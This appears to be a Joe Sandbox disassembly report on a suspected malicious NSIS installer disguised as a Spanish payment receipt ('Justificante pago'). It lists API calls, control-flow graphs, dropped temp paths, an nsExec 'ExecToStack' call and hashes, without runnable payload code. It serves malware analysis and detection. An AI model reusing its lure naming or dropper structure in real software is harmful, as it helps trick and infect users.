                                                                                                                                                                                      • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                                      • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Justificante pago-09453256434687.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                    • API String ID: 2803837635-1997050567
                                                                                                                                                                                    • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                                                                                                                                                    • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                                                                                                                                                                                    Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 442 406544-40654f 443 406551-406560 442->443 444 406562-406578 442->444 443->444 445 406590-406599 444->445 446 40657a-406587 444->446 448 406774-40677f 445->448 449 40659f 445->449 446->445 447 406589-40658c 446->447 447->445 451 406781-406785 call 406507 448->451 452 40678a-40678b 448->452 450 4065a4-4065b1 449->450 450->448 453 4065b7-4065c0 450->453 451->452 455 406752 453->455 456 4065c6-406603 453->456 457 406760-406763 455->457 458 406754-40675e 455->458 459 4066f6-4066fb 456->459 460 406609-406610 456->460 461 406765-40676e 457->461 458->461 462 4066fd-406703 459->462 463 40672e-406733 459->463 464 406612-406614 460->464 465 406615-406617 460->465 461->448 466 4065a1 461->466 467 406713-40671f call 406507 462->467 468 406705-406711 call 40644e 462->468 471 406742-406750 lstrlenW 463->471 472 406735-40673d call 406544 463->472 464->465 469 406654-406657 465->469 470 406619-406637 call 4063d5 465->470 466->450 483 406724-40672a 467->483 468->483 473 406667-40666a 469->473 474 406659-406665 GetSystemDirectoryW 469->474 484 40663c-406640 470->484 471->461 472->471 480 4066d3-4066d5 473->480 481 40666c-40667a GetWindowsDirectoryW 473->481 479 4066d7-4066db 474->479 487 4066dd-4066e1 479->487 488 4066ee-4066f4 call 40678e 479->488 480->479 486 40667c-406684 480->486 481->480 483->471 485 40672c 483->485 484->487 489 406646-40664f call 406544 484->489 485->488 493 406686-40668f 486->493 494 40669b-4066b1 SHGetSpecialFolderLocation 486->494 487->488 490 4066e3-4066e9 lstrcatW 487->490 488->471 489->479 490->488 499 406697-406699 493->499 497 4066b3-4066cd SHGetPathFromIDListW CoTaskMemFree 494->497 498 4066cf 494->498 497->479 497->498 498->480 499->479 499->494
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040665F
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055A0,Completed,00000000,00000000,00418EC0,00000000), ref: 00406672
                                                                                                                                                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                    • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                    • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                    • API String ID: 4260037668-905382516
                                                                                                                                                                                    • Opcode ID: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                                    • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                                                                                                                                                                                    Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 564 40176f-401794 call 402da6 call 405e4d 569 401796-40179c call 406507 564->569 570 40179e-4017b0 call 406507 call 405dd6 lstrcatW 564->570 575 4017b5-4017b6 call 40678e 569->575 570->575 579 4017bb-4017bf 575->579 580 4017c1-4017cb call 40683d 579->580 581 4017f2-4017f5 579->581 588 4017dd-4017ef 580->588 589 4017cd-4017db CompareFileTime 580->589 582 4017f7-4017f8 call 405fd2 581->582 583 4017fd-401819 call 405ff7 581->583 582->583 591 40181b-40181e 583->591 592 40188d-4018b6 call 405569 call 4032b4 583->592 588->581 589->588 593 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 591->593 594 40186f-401879 call 405569 591->594 604 4018b8-4018bc 592->604 605 4018be-4018ca SetFileTime 592->605 593->579 626 401864-401865 593->626 606 401882-401888 594->606 604->605 608 4018d0-4018db CloseHandle 604->608 605->608 609 402c33 606->609 611 4018e1-4018e4 608->611 612 402c2a-402c2d 608->612 613 402c35-402c39 609->613 616 4018e6-4018f7 call 406544 lstrcatW 611->616 617 4018f9-4018fc call 406544 611->617 612->609 623 401901-4023a2 call 405b67 616->623 617->623 623->612 623->613 626->606 628 401867-401868 626->628 628->594
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes,?,?,00000031), ref: 004017B0
                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes,?,?,00000031), ref: 004017D5
                                                                                                                                                                                      • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                                      • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                                      • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                                      • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                                      • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes$C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dll$ExecToStack
                                                                                                                                                                                    • API String ID: 1941528284-3918912089
                                                                                                                                                                                    • Opcode ID: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                                    • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                                                                                                                                                                    • Opcode Fuzzy Hash: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                                    • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                                                                                                                                                                                    Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 630 405569-40557e 631 405584-405595 630->631 632 405635-405639 630->632 633 4055a0-4055ac lstrlenW 631->633 634 405597-40559b call 406544 631->634 636 4055c9-4055cd 633->636 637 4055ae-4055be lstrlenW 633->637 634->633 639 4055dc-4055e0 636->639 640 4055cf-4055d6 SetWindowTextW 636->640 637->632 638 4055c0-4055c4 lstrcatW 637->638 638->636 641 4055e2-405624 SendMessageW * 3 639->641 642 405626-405628 639->642 640->639 641->642 642->632 643 40562a-40562d 642->643 643->632
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                                    • lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                                    • lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                                    • SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                                      • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                      • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                    • String ID: Completed
                                                                                                                                                                                    • API String ID: 1495540970-3087654605
                                                                                                                                                                                    • Opcode ID: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                                    • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                                                                                                                                                                                    Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 644 4032b4-4032cb 645 4032d4-4032dc 644->645 646 4032cd 644->646 647 4032e3-4032e8 645->647 648 4032de 645->648 646->645 649 4032f8-403305 call 403499 647->649 650 4032ea-4032f3 call 4034af 647->650 648->647 654 403450 649->654 655 40330b-40330f 649->655 650->649 658 403452-403453 654->658 656 403315-403335 GetTickCount call 406a2f 655->656 657 403439-40343b 655->657 668 40348f 656->668 670 40333b-403343 656->670 659 403484-403488 657->659 660 40343d-403440 657->660 662 403492-403496 658->662 663 403455-40345b 659->663 664 40348a 659->664 665 403442 660->665 666 403445-40344e call 403499 660->666 671 403460-40346e call 403499 663->671 672 40345d 663->672 664->668 665->666 666->654 677 40348c 666->677 668->662 674 403345 670->674 675 403348-403356 call 403499 670->675 671->654 680 403470-40347c call 4060a9 671->680 672->671 674->675 675->654 683 40335c-403365 675->683 677->668 686 403435-403437 680->686 687 40347e-403481 680->687 685 40336b-403388 call 406a4f 683->685 690 403431-403433 685->690 691 40338e-4033a5 GetTickCount 685->691 686->658 687->659 690->658 692 4033f0-4033f2 691->692 693 4033a7-4033af 691->693 696 4033f4-4033f8 692->696 697 403425-403429 692->697 694 4033b1-4033b5 693->694 695 4033b7-4033e8 MulDiv wsprintfW call 405569 693->695 694->692 694->695 702 4033ed 695->702 700 4033fa-4033ff call 4060a9 696->700 701 40340d-403413 696->701 697->670 698 40342f 697->698 698->668 705 403404-403406 700->705 704 403419-40341d 701->704 702->692 704->685 706 403423 704->706 705->686 707 403408-40340b 705->707 706->668 707->704
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                                                                    • String ID: ... %d%%$G8@
                                                                                                                                                                                    • API String ID: 551687249-649311722
                                                                                                                                                                                    • Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                                    • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                                                                                                                                                                                    Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 708 406864-406884 GetSystemDirectoryW 709 406886 708->709 710 406888-40688a 708->710 709->710 711 40689b-40689d 710->711 712 40688c-406895 710->712 714 40689e-4068d1 wsprintfW LoadLibraryExW 711->714 712->711 713 406897-406899 712->713 713->714
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                                    • wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                    • API String ID: 2200240437-1946221925
                                                                                                                                                                                    • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                    • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                                                                                                                                                                                    Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 715 405a38-405a83 CreateDirectoryW 716 405a85-405a87 715->716 717 405a89-405a96 GetLastError 715->717 718 405ab0-405ab2 716->718 717->718 719 405a98-405aac SetFileSecurityW 717->719 719->716 720 405aae GetLastError 719->720 720->718
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405A8F
                                                                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405AAE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 3449924974-3081826266
                                                                                                                                                                                    • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                    • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                                                                                                                                                                                    Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
